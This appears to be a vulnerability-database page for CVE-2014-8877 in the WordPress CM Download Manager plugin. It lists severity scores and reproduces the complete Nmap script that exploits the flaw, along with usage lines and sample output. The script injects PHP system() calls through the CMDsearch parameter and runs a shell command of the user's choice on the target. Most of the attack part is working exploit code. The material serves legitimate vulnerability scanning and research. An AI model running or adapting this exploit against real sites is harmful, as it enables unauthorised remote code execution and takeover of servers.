9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%
Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
CM Download Manager plugin does not correctly sanitise the user input which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP ‘create_function’ function.
The script injects PHP system() function into the vulnerable target in order to execute specified shell command.
Command to execute. Default: nil
Wordpress root directory on the website. Default: /
See the documentation for the slaxml library.
See the documentation for the http library.
See the documentation for the vulns library.
See the documentation for the smbauth library.
nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-vuln-cve2014-8877:
| VULNERABLE:
| Code Injection in Wordpress CM Download Manager plugin
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-8877
| CM Download Manager plugin does not correctly sanitise the user input
| which allows remote attackers to execute arbitrary PHP code via the
| CMDsearch parameter to cmdownloads/, which is processed by the PHP
| 'create_function' function.
|
| Disclosure date: 2014-11-14
| Exploit results:
| Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
| References:
|_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local url = require "url"
local vulns = require "vulns"
local base64 = require "base64"
local rand = require "rand"
description = [[
Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM
Download Manager plugin. Versions <= 2.0.0 are known to be affected.
CM Download Manager plugin does not correctly sanitise the user input which
allows remote attackers to execute arbitrary PHP code via the CMDsearch
parameter to cmdownloads/, which is processed by the PHP 'create_function'
function.
The script injects PHP system() function into the vulnerable target in order to
execute specified shell command.
]]
---
-- @usage
-- nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
-- nmap --script http-vuln-cve2014-8877 <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-vuln-cve2014-8877:
-- | VULNERABLE:
-- | Code Injection in Wordpress CM Download Manager plugin
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-8877
-- | CM Download Manager plugin does not correctly sanitise the user input
-- | which allows remote attackers to execute arbitrary PHP code via the
-- | CMDsearch parameter to cmdownloads/, which is processed by the PHP
-- | 'create_function' function.
-- |
-- | Disclosure date: 2014-11-14
-- | Exploit results:
-- | Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
-- | References:
-- |_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877
--
-- @args http-vuln-cve2014-8877.uri Wordpress root directory on the website. Default: /
-- @args http-vuln-cve2014-8877.cmd Command to execute. Default: nil
---
author = "Mariusz Ziulek <mzet()owasp org>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}
portrule = shortport.http
function genHttpReq(host, port, uri, cmd)
local rnd = nil
local payload = nil
local vulnPath = '/cmdownloads/?CMDsearch='
if cmd ~= nil then
payload = '".system("'..cmd..'")."'
else
rnd = rand.random_alpha(15)
local encRnd = base64.enc(rnd)
payload = '".base64_decode("'..encRnd..'")."'
end
local finalUri = uri..vulnPath..url.escape(payload)
local req = http.get(host, port, finalUri)
stdnse.debug(1, ("Sending GET '%s%s%s' request"):format(uri, vulnPath, payload))
if not(rnd) then
return req
else
return req, rnd
end
end
action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
local rnd = nil
local req, rnd = genHttpReq(host, port, uri, nil)
-- check if target is vulnerable
if req.status == 200 and string.match(req.body, rnd) ~= nil then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Code Injection in Wordpress CM Download Manager plugin',
state = vulns.STATE.NOT_VULN,
description = [[
CM Download Manager plugin does not correctly sanitise the user input
which allows remote attackers to execute arbitrary PHP code via the
CMDsearch parameter to cmdownloads/, which is processed by the PHP
'create_function' function.
]],
IDS = {CVE = 'CVE-2014-8877'},
references = {
'www.securityfocus.com/bid/71204/'
},
dates = {
disclosure = {year = '2014', month = '11', day = '14'},
},
}
stdnse.debug(1, string.format("Random string '%s' was found in the body response. Host seems to be vulnerable.", rnd))
vuln.state = vulns.STATE.EXPLOIT
-- exploit the vulnerability
if cmd ~= nil then
-- wrap cmd with pattern which is used to filter out only relevant output from the response
local pattern = rand.random_alpha(5)
req = genHttpReq(host, port, uri, 'echo '..pattern..';'..cmd..';echo '..pattern..';')
if req.status == 200 then
-- take first lazy match as command output
local cmdOut = nil
for m in string.gmatch(req.body, pattern..'\n(.-)\n'..pattern) do
cmdOut = m
break
end
if cmdOut ~= nil then
vuln.exploit_results = cmdOut
end
end
end
return vulnReport:make_output(vuln)
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%